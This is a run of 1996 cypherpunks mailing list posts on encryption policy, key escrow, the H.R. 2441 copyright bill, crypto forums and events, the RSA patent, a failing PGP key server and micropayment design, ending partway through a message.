Message-ID: <Pine.LNX.3.93.960620023531.509A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jun 1996, Igor Chudov @ home wrote:
> Lucky Green wrote:
> > At 16:27 6/18/96, TM Peters wrote:
> > >Speaking to the Commonwealth Club of California in San Francisco, Reno said
> > >her plan would require people to register with the new agency the secret
> > government. I wonder what the penalties for failure to comply with this
> > requirement will be.
> A couple of questions [admittedly, I am not the best expect in American
> politics]:
 
> 1) Is there anything real that individual citizens can do?
	
	1) Refuse to escrow keys. 
	2) Scream bloody murder about the scheme.
	3) Vote libertarian.
	

> 2) Would it be helpful to kick democrats out of office and replace
> them with republicans? In other words, are republicans any better
> than democrats in respecting citizens' right to protecting their
> privacy from the government?

	There is no difference between pigs and men. At least not to this
donkey's eyes. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 20 Jun 1996 22:38:15 +0800
To: cypherpunks@toad.com
Subject: FBI utters root passsword to the Constitution
Message-ID: <199606201102.EAA00947@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


FBI InfoSec Guru Randy Perlman (Prilamen? Filament?) was interviewed on
CNN BizNews this morning by Deborah Marchini:  "Hackers" are menacing the 
net and society.  

Marchini prompted him but he concurred:  Hackers are a *THREAT TO 
NATIONAL SECURITY*.  There you have it, the root password to the 
Constitution.  Illegal wiretapping, assassination, anything is now justified
in the defense of our NATIONAL INFORMATION INFRASTRUCTURE.

bd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Thu, 20 Jun 1996 21:52:44 +0800
To: cypherpunks@toad.com
Subject: Congress is at it again
Message-ID: <199606201020.GAA28570@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


HOME RECORDING RIGHTS COALITION ALERT !!


IMMINENT CONGRESSIONAL ACTION ON NII COPYRIGHT BILL
THREATENS CONSUMER ELECTRONICS PRODUCTS


The House of Representatives Subcommittee on Courts and Intellectual
Property will meet in the next few days to vote on H.R. 2441, the "NII
Copyright Protection Act." If you or your business are in the
congressional district of one of the Members of Congress listed below,
please call the Subcommittee member who represents you NOW.  Tell his
office that this badly imbalanced bill shouldn't be voted on unless
and until the following problem is addressed.   If passed in its
current form, H.R. 2441 would:

 o make it a crime to manufacture the next generation of VCRs,
personal computers and other digital devices needed for recreational
and educational use by adding a sweeping and overbroad new Section
1201 to the Copyright Act.

If you need more information, check out the HRRC home page at 
http://www.access.digex.net/~hrrc/ or call toll free 1-800-282-8273.

ACTION NEEDED NOW!!!

Please immediately prepare a  letter to send (use the draft letter
below as a model) - keep it short. --AND CALL -- the Member of the
House Judiciary Subcommittee on Courts and Intellectual Property who
represents you (see list).  These contacts must be made NO LATER THAN
Tuesday, June 18, and preferably sooner. In addition, please forward
this alert on to your friends and colleagues.

Please address all letters as indicated in the list below to
Washington, DC  20515.  All phone and fax (f) numbers are area code
(202):

The Honorable Carlos Moorhead R-CA 
2346 RHOB
225-4176
f:226-1279


The Honorable James Sensenbrenner R-WI
2332 RHOB
225-5101
f:225-3190


The Honorable George Gekas R-PA
2410 RHOB
225-4315
f: 225-8440


The Honorable Howard Coble R-NC 
403 CHOB
225-3065
f:225-8611


The Honorable Elton Gallegly R-CA 
2441 RHOB
225-5811
f:225-1100


The Honorable Charles Canady R-FL 
1222 LHOB
225-1252
f:225-2279


The Honorable Bob Goodlatte R-NC 
123 CHOB
225-5431
f: 225-9681


The Honorable Martin Hoke R-OH
212 CHOB
225-5871
f:226-0994


The Honorable Sonny Bono R-CA
512 CHOB
225-5330
f:225-2961


The Honorable John Conyers, Jr. D-MI
2426 RHOB
225-5126
f:225-0072


The Honorable Patricia Schroeder D-CO
2307 RHOB
225-4431
f:225-5842


The Honorable Howard Berman D-CA
2231 RHOB
225-4695
f:225-5279


The Honorable Rick Boucher D-VA
2245 RHOB
225-3861
f:225-0442


The Honorable Jerry Nadler D-NY
109 CHOB
225-5635
f:225-6923


The Honorable Xavier Becerra D-CA
1119 LHOB
225-6235
f:225-2202



 SAMPLE LETTER

The Honorable                        
Address
Washington, DC  20515

Dear Rep. ____________:

I have learned that Section 1201 of the NII Copyright Protection Act
(H.R. 2441) could take away my right to use new digital video
technology for my personal recording. It also could delay or even
prevent these new products from being available to consumers.

If I record television programs, I do it for my personal use and
convenience. The Supreme Court's "Betamax" decision confirmed my right
to do this. Section 1201 will change the current law so that I may not
be able to do this in the future with new digital video products.

I understand that a House subcommittee vote on this bill is planned
for next week. I realize that the copyright issue is complex, but
please remember to protect my rights as a consumer. I hope you will
vote against H.R. 2441 as drafted. Will you please let me know your
position on this issue?

Sincerely,

YOUR NAME
Thank you.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 20 Jun 1996 22:09:00 +0800
To: reagle@MIT.EDU
Subject: Re: Safemail
Message-ID: <2.2.32.19960620103633.00b83078@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:10 PM 6/19/96 CDT, Daniel R. Oelke wrote:

>He did assure me it wasn't GOST, or anything published.
>Story was that a Russian emigrant (sp?) came over to the US 
>and this is his algorithm.  Apparently this person is 
>not willing (at this time) to put the algorithm out for
>public review. 

"Howdy.  Since I just met you in this bar and really like you I wanted to
tell you about this Russian sailor I met.  His ship is in port for only a
few more hours and he has all these Russian gold coins that he wants to
sell.  Now you know he can't sell the coins in those commie countries so
he's so desperate for cash that he'll sell them for just $100 an ounce.
I've got $5,000 right here in this envelope why don't you take $5,000 out of
your bank and we'll meet him and make some fast dough."

I think that sailor has a great new secret algorithm as well.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 21 Jun 1996 05:02:37 +0800
To: cypherpunks@toad.com
Subject: [SF Bay Area] Security And Freedom through Encryption Forum
Message-ID: <v01540b02adef1b32a600@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Seen on the net:


SAFE: Security And Freedom through Encryption Forum, July 1, 1996
=================================================================

   For a national encryption policy that promotes commerce and protects
   privacy


http://www.crypto.com/safe


NOTE: Please register for and reserve your free ticket at
 http://www.crypto.com/safe/sign.html
so you don't miss out!  Space is limited!


Save the Date! July 1, 1996 Stanford University, Stanford, California



  Event Information, Speakers, and Agenda



   On July 1, 1996 in the heart of California's Silicon Valley, members
   of Congress and prominent computer industry leaders and privacy
   advocates will meet to discuss the need to reform U.S. encryption
   policy.

   Encryption technologies, the "locks and keys" of the Information Age,
   are an essential component of a secure and trusted Global Information
   Infrastructure. Every day, millions of dollars in commercial
   transactions and the private communications of individuals traverse
   the global network. All are vulnerable to the prying eyes of
   industrial spies, hackers, and rogue foreign governments.

   Computer users need strong encryption technology to protect themselves
   online, and U.S. businesses need the ability to export strong
   encryption in order to build a secure Global Information
   Infrastructure.

   Yet current U.S. export controls and other limits on encryption
   technology are limiting the widespread availability of strong,
   easy-to-use privacy and security products. As a result, these policies
   are stifling the growth of electronic commerce, preventing computer
   users from protecting their privacy, and handicapping U.S. industry in
   the global marketplace. Until these cold war barriers are removed, the
   full potential of the Internet and the future of electronic commerce
   will never be realized.

   National and local press are encouraged to attend this high profile
   event. For more information, please contact Danielle Kolb or Alan
   Davidson at the Center for Democracy and Technology, +1 202 637 9800.


     _________________________________________________________________



Event Information

     * Location:Kresge Auditorium at Stanford University, Stanford,
       California
     * Date: July 1, 1996, 9:00 am - 4:00 pm
     * Admission: Reserve your Free Ticket Today!
                  http://www.crypto.com/safe/sign.html


Confirmed Participants Include:



   Industry Leaders and Cryptographers:
     * Marc Andreeson, Vice President, Netscape Communications Corp.
     * James Bidzos, President, RSA Data Security
     * Eric Schmidt, Chief Technical Officer, Sun Microsystems
     * Brad Silverberg, Senior Vice President, Microsoft Corp.
     * Computer security experts Matt Blaze and Eric Thompson

   Members of Congress:
     * Rep. Anna Eshoo (D-CA)
     * Rep. Tom Campbell (R-CA)
     * Rep. Zoe Lofgren (D-CA)
     * Sen. Conrad Burns (R-MT)
     * Sen. Patrick Leahy (D-VT) (by satellite)

   Demonstrations of Encryption Products and Techniques:

     * SAFE Forum Educational Demo Team:

      Company
                         Contact/Demo Person
                                                          Technologies
  _______________________________________________________________________

 Cisco
                     Marcy Shrader/Elizabeth Kaufman
                                                  Router card, routers
 Cybercash
                     Shannon McElyea
                                                  Digital cash/
                                                  online transactions
 Cygnus
                     Philip Peake
                                                  Kerberos
 Cylink
                     Paula Dunne
                                                  Sniffing/cracker demo
 Digital[*]
                     Steve Monticone
                                                  Firewall tunnel,
                                                  workstations, various
 Milky Way
                     Dave Della Maggiore
                                                  firewalls
 Mytech
                     Ann Brown
                                                  Biometric encryption
 National Semiconductor
                     Kate Peters/Larry Van Valkenburgh
                                                  PCMCIA cards/devices
 PGP
                     Jesse Anton
                                                  email, encrypting phone
 RSA
                     Kurt Stammberger
                                                  S/MIME, various


 [* Not absolutely confirmed yet, but very interested and confirming
 participation with company.]


   Additional invited guest include prominant industry leaders, privacy
   advocates, security experts, and Members of Congress. Watch
   http://www.crypto.com/safe/safe_program.html for updates.


     _________________________________________________________________

  Sponsors Of The SAFE Forum:

America Online
American Civil Liberties Union
Americans for Tax Reform
AT&T
Business Software Alliance
Center for Democracy and Technology
Center for National Security Studies
Commercial Internet eXchange
CompuServe Incorporated
Computer Professionals for Social Responsibility
Cylink Corporation
EDS
Electronic Frontier Foundation
Electronic Messaging Association
Electronic Privacy Information Center
Information Technology Association of America
IEEE - USA
Media Institute
Microsoft Corporation
National Association of Manufacturers
Netcom Online Communication Services
Netscape Communications Corporation
Novell, Inc.
Oracle Corporation
Pacific Telesis Group
Prodigy, Inc.
Progress and Freedom Foundation
Securities Industry Association
Software Publishers Association
Sybase, Inc.
Voters Telecommunications Watch
Wired Magazine

  __________________________________________________________________________
--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 21 Jun 1996 01:08:07 +0800
To: nobody@vegas.gateway.com (Anonymous Remail Service)
Subject: Re: Congress is at it again
In-Reply-To: <199606201020.GAA28570@black-ice.gateway.com>
Message-ID: <0lmI_vm00YUw82dYQb@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


There's no imminent Congressinal action here, folks. Note that HR2441
may be revived next year, but we have a reprieve for now.

-Declan


Excerpts from internet.cypherpunks: 20-Jun-96 Congress is at it again by
Anonymous R. Service@veg 
> IMMINENT CONGRESSIONAL ACTION ON NII COPYRIGHT BILL
> THREATENS CONSUMER ELECTRONICS PRODUCTS
>  
>  
> The House of Representatives Subcommittee on Courts and Intellectual
> Property will meet in the next few days to vote on H.R. 2441, the "NII
> Copyright Protection Act." If you or your business are in the
> congressional district of one of the Members of Congress listed below,
> please call the Subcommittee member who represents you NOW.  Tell his
> office that this badly imbalanced bill shouldn't be voted on unless
> and until the following problem is addressed.   If passed in its
> current form, H.R. 2441 would:
>  
>  o make it a crime to manufacture the next generation of VCRs,
> personal computers and other digital devices needed for recreational
> and educational use by adding a sweeping and overbroad new Section
> 1201 to the Copyright Act.
>  
> If you need more information, check out the HRRC home page at 
> http://www.access.digex.net/~hrrc/ or call toll free 1-800-282-8273.
>  
> ACTION NEEDED NOW!!!
>  
> Please immediately prepare a  letter to send (use the draft letter
> below as a model) - keep it short. --AND CALL -- the Member of the
> House Judiciary Subcommittee on Courts and Intellectual Property who
> represents you (see list).  These contacts must be made NO LATER THAN
> Tuesday, June 18, and preferably sooner. In addition, please forward
> this alert on to your friends and colleagues.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Thu, 20 Jun 1996 18:47:14 +0800
To: "geeman@best.com>
Subject: Re: Fuseable Links - no guarantees??
In-Reply-To: <01BB5DC1.392DE140@geeman.vip.best.com>
Message-ID: <199606200625.IAA03588@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| So I guess one can look at the circuitry and apply non-standard voltage and
| current values, or even non-standard timing values -- and do bad things
| to these circuits. So this begs the question: Is there anyone who has looked
| at "computer security" issues at this level? 
| 
| >>> Of course, many have.

Does anyone have any pointers to papers or literature on this?

-Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 21 Jun 1996 01:34:01 +0800
To: jamesd@echeque.com
Subject: Re: Does information want to be free?
Message-ID: <199606201314.JAA22342@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 20 Jun 96 at 0:24, jamesd@echeque.com wrote:

> At 05:26 PM 6/16/96 -0400, Joseph M. Reagle Jr. wrote:
> >        If someone found out all the medical information of cypherpunks list
> > members and distributed about the Net, how would people feel? 
> 
> It would worry me far less than the fact that my medical records are
> accessible to the government.

Or rather, that the government tends to have (read: covet) information which
the rest of us don't have (often about ourselves).

Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 21 Jun 1996 03:49:44 +0800
To: dcsb@ai.mit.edu
Subject: DCSB: Electronic Commerce: The State of the Art
Message-ID: <v03006f00adef03e56abe@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




                 The Digital Commerce Society of Boston

                               Presents

                             Peter Loshin,
                              Author of
          Electronic Commerce: Online Ordering and Digital Money


                "Electronic Commerce: The State of the Art"


                        Tuesday, June 2, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Pete Loshin has been writing about networking, the Internet and electronic
commerce for the past two years; before that he worked as a TCP/IP
networking engineer for a Cambridge research lab and systems manager for a
major publishing company.  Books currently available include _Electronic
Commerce: Online Ordering and Digital Money_ and _TCP/IP for Everyone_.
Pete plans to launch an Internet commerce newsletter this fall.


The future always looks shinier, more efficient and more pleasant than the
present.  The same holds true for the future of electronic commerce, but a
lot of people are not waiting for the clean and bright future of SET and
unrestricted crypto.  They are doing business right now, over the Internet,
and what they do will affect the way we do business well into the next
century.  Electronic commerce is still largely an art, and after lunch on
Monday July 2 Pete will talk a little bit about the state of that art.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, July 2, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, June 29, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 August      Duane Hewitt     Idea Futures
 September   Tatsuo Tanaka    Some Economics of Digital Cash

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMclWIvgyLN8bw6ZVAQHTKQP+IPEGyKdwqIC3TcECkuem35RF/dK9WDtr
A3YpRXTU4+4nOaI+KMDK5hH0vV7qOI0t+l3fKdRYjHRBk3tp4GPy/B2GylJFTWtE
STYDza4xdghiq/d4IkZW0mn3XF7bK2YlsR8Xqe1dLXkpuoEmi4daiaby4Bwqf35W
4cXLQdRqZ0U=
=2CcC
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Fri, 21 Jun 1996 08:15:15 +0800
To: cypherpunks@toad.com
Subject: where'd Bal's PKS go?
Message-ID: <199606201724.KAA07394@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Did it move?  I hadn't seen any announcement of this...

me
-- 
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 21 Jun 1996 04:00:22 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Safemail
In-Reply-To: <9606191910.AA11834@spirit.aud.alcatel.com>
Message-ID: <199606201529.KAA02594@homeport.org>
MIME-Version: 1.0
Content-Type: text


Not to defend the safemail folks, but this does remind me of something
that NeXT did with Eliptic curve based systems; there was no storage
of the private key, it was generated from the passphrase at run time.
It was a side discussion, maybe with Andrew Lorenstien?  Andrew?



Daniel R. Oelke wrote:

| All in all they guy was plesant enough, but no real 
| details on how the system works.  What I got was that
| they "private" key is what you type in.  This is then 
| hashed (he even used the word hash) into a 22 character
| public key that you share with your friends.  
| Even at 8 bits/charcter, 176 bits doesn't sound secure
| for a public key algorithm, but then again this isn't
| RSA we are looking at.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 21 Jun 1996 09:08:33 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Congress is at it again
Message-ID: <2.2.32.19960620173912.00cde130@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 6/20/96 -0400, you wrote:
>There's no imminent Congressinal action here, folks. Note that HR2441
>may be revived next year, but we have a reprieve for now.

I hate to be cynical, but I seem to remember the same thing being said about
the CDA and the Digital Telephony bills.

Things have a strange habit of getting snuck through at the last moment...
---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 21 Jun 1996 08:39:10 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Oil Change software snoops through hard drive
In-Reply-To: <v01510115adedec5bd37a@[204.62.128.229]>
Message-ID: <Pine.GUL.3.93.960620104638.4657A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jun 1996, Declan McCullagh wrote:

> Alan forwarded this to me. Thought it might be interesting. -Declan
[..].]
> Unanswered Qs:
> 1) What other kinds of info does/can it troll for?
> 2) What does it do when it finds unregistered software?
> 3) Does it implicate ECPA?
> 4) Will updates be available through other means?
> 5) Must a user affirmatively grant permission to the software agent?
> 6) Can a user decline or limit the agent's access?
> 7) What uses may the agent's owner make of data collected?
> etc.

Well, if you want definitive answers, use Stan Mitchell's File Monitor,
ftp://ftp.ora.com/pub/examples/windows/win95.update/schulman.html#w95fmon

But free to fear-monger in any case...

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 21 Jun 1996 08:35:23 +0800
To: Intense <cypherpunks@toad.com
Subject: Re: Current status of RSA patent...
Message-ID: <199606201757.KAA08100@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 6/20/96 -0400, Intense wrote:
>
>does not matter - it will be renewed in the interest of the government
>The goverment want's there backdoor...  would you expect less?

As far as I know, patents can't be "renewed."  I've heard they can be 
"re-issued," amended, but to my knowledge that doesn't extend their term.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Fri, 21 Jun 1996 05:31:17 +0800
To: cypherpunks@toad.com
Subject: Re: Current status of RSA patent...
In-Reply-To: <Pine.3.89.9606191052.A14088-0100000@netcom6>
Message-ID: <Pine.LNX.3.91.960620105421.115A-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain



does not matter - it will be renewed in the interest of the government
The goverment want's there backdoor...  would you expect less?

the only pgp I will use is that from MIT
it has no back door


               *          <exalt@miworld.net>           *


On Wed, 19 Jun 1996, Paul S. Penrod wrote:

> 
> Can anyone provide additional information on the RSA patent status? 
> If memory serves me, it is due to expire sometime in 1997. 
> 
> Also, what are the ramifications of deploying software based around it, 
> such as PGP 2.62i (from UK)?
> 
> ...Paul
> 
> -------------------------------------------------------------------------
> 
> "Faced with the choice between changing one's mind and proving that there
>  is no need to do so, almost everybody gets busy on the proof"
> 
>                                             -- John Kenneth Galbraith
> 
> "Success is attending a funeral as a spectator"
> 
>                                             -- E. BonAnno 
> 
> -------------------------------------------------------------------------
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 21 Jun 1996 05:35:19 +0800
To: dcsb@ai.mit.edu
Subject: DCSB: Electronic Commerce: The State of the Art
Message-ID: <v03006f04adef19a686d0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>                  The Digital Commerce Society of Boston
>
>                                Presents
>
>                              Peter Loshin,
>                               Author of
>           Electronic Commerce: Online Ordering and Digital Money
>
>
>                 "Electronic Commerce: The State of the Art"
>
>
>                         Tuesday, June 2, 1996
                                   ^^^^^^

Heh. Just testing. ;-)

The real date is, of course, Tuesday, *July* 2, 1996.

My apologies!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMclqGvgyLN8bw6ZVAQHIcgP/WSt1fl5qnFIQ4bX8UP4SCOXNELJ/Y5c8
5AOOL6o307YP0iOzUN8wh6mJx8QkpdXmfYIYA039CmAetRK0DLs6sfP12yRfuHi8
36+7LRAIqCZnM9XVu/LEmtlZaiy6YhFDxq0qIXf8Iie4mA201W+g4I1PgG0nV8qX
3jeyh/+mD4I=
=qj8W
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Fri, 21 Jun 1996 09:57:59 +0800
To: me@muddcs.cs.hmc.edu
Subject: Re: where'd Bal's PKS go?
Message-ID: <199606201826.LAA28040@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: me@muddcs.cs.hmc.edu, cypherpunks@toad.com
Date: Thu Jun 20 13:26:14 1996
> Did it move?  I hadn't seen any announcement of this...
> 
> me
> -- 
> Michael Elkins <me@cs.hmc.edu>                        
http://www.cs.hmc.edu/~me
> PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC
> 
> 

This is the error i get.  Could we have a rUnaway process?

   ----- Transcript of session follows -----
<<< RCPT To:<pgp-public-keys@BIG-SCREW.MIT.EDU>
<<< DATA
sh: fork failed - too many processes
554 "|/u1/jis/newkeyserver/bin/pks-mail.sh 
/u1/jis/newkeyserver/etc/pksd.conf"... unknown mailer error 1

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMcmX4MtPRTNbb5z9AQE3mgf/dIQjOBpeaw83FaqnQIj4oaZySYqboUyD
J9/EoaF8kwQmPgeQzCj866AY39H7M7srgurz1YXKu7LrMWBuTkobJnsE/tX2TK+y
AvTUXtQUlite2rL4uV7664F2rG2r0UfMnjjxv7fhul1Ayg7M2k7jVTLKDD9h21Y9
84ZJnVlka7TId5cmAzSWme0/qHyhuIkkgzEP27jxPeg+v9WM2qgMY3kva9W4yCEk
pBxaC7HwJI7vfaurY4dgggakEr4yarBvyITRebYAa02ub8lHTsgAXYsF2I53OPZG
nyphOgst4itOME8g0ePpLKFQ8PLn7M/9qdK7oh7JX0jt5dLpJsvE/Q==
=7Y05
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 21 Jun 1996 06:17:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Fastest DES?
Message-ID: <199606201639.LAA02824@homeport.org>
MIME-Version: 1.0
Content-Type: text


I can't find UFC (Ultra fast crypt) on idea.sec.dsi.unimi.it.  Could
someone point me to some very fast DES code?  I'm planning to
surgically implant it in a product that uses DES to test a few
theories, so other ciphers aren't interesting; needs to be fast des.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 21 Jun 1996 10:07:14 +0800
To: www-buyinfo@allegra.att.com
Subject: Re: Micropayments: myth?
In-Reply-To: <13618.835214087@odin.nma.com>
Message-ID: <199606201905.MAA29199@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



more dazed and confused responses on microcurrency... why are people
making this so complicated???

From: Einar Stefferud <Stef@nma.com>
>
>Your analogy breaks because you do not provide for the corresponding
>of connections between the gas tank and the dashboard indicator for
>the case of buying small items from many different vendors.
>
>I can see each vendor site giving you a "gas gauge" indicator, either
>showing how much you have cumulatively charged at a given site, or how
>much is left on your prepaid site account (these are the same thing in
>terms of adding up charges), but I fail to see how your analog applies
>outside the local control of each vendor site.

the *vendor* *does*not* control the "gas gauge". the gauge is presented
by your LOCAL SOFTWARE. (for those late into this, the gas gauge analogy
is used as a visual metaphor for the way a browser would keep track
of microcharges).  it would make *no*sense* for each provider to
create their own gauge. they might create one for their own site
of your transactions, but you absolutely must have a tracking mechanism
that is built into your own software and NOT under the control of the
outside agency. 

don't people get this? with microcurrency, you don't say to a 
seller, "bill me for this item". it would rarely work like that at
all. instead, it is, "here is my money, please give me the item". 
the money exchange is always part of the complete transaction. 
billing is an archaic concept in this paradigm that is superfluous.
you only need it when you can't have instantaneous transactions.

>In short, you have again shown that microcharging systems are limited
>to local accumulations.  Your gas tank example is limited to the car
>you are driving, and does not tell you anything about anything else.

the gas gauge analogy seemed transparently obvious to me. 
you are proving a rule I've noted in cyberspace, that if anything
can be misunderstood, it will be.  you are confusing yourself. 

the analogy would be more like the
following: you can drive on different roads, and some take more
gas than others. but the roads cannot themselves suck gas
out of your tank or change your gas meter.

>Unfortunately, you appear to be applying the idea to a collection of
>vendors which you wish to visit, which means that someone somewhere
>must be getting the disparate charges from different vendors to update
>your singular gas gauge.

NO, NO, NO!!!! your local software controls your gas gauge. NOBODY
ELSE. furthermore, the site *never* grabs money from you. this is
a *billing* paradigm. you either send money, or no money can
be transferred. the site can *request* money but such a system
would only be automatic if the charge fell within the minimal limits
set by the user (i.e. max $1.00 per hour, max 5c per transaction,
max 10 transactions per minute, or whatever--  all this is 
trivial to implement)

>Drawing analogies is great fun, but all analogies break at some point
>in their life, because they abstract away enough detail to paint a
>simplified picture.  Sometime this leads to complete failure to map as
>intended.

analogies are meant to help people understand something simple. if the
thing itself is simple, and people can't even understand it in
the simple state, often the analogy will confuse them even further.

>}The billing happens, as others have previously noted, entirely at the 
>}client side.  There's no reason the wallet or web browser can't keep a 
>}log of expenditures, and there's no chance for spoofery at that point 
>}(the wallet knows where it sent money).  

I wish people would stop talking about BILLING in regard to microcurrency.
I believe it is mostly a flawed concept that is not largely going to
apply to microcurrency. perhaps some other term is appropriate, any
takers? it seems to me a lot of the misconceptions I've been seeing
are based on the idea that BILLING would somehow be involved. 
billing is involved in cash systems in which you dissociate the
transfer of material from the transaction. this will generally
not happen with microcurrency imho, and it is largely only useful
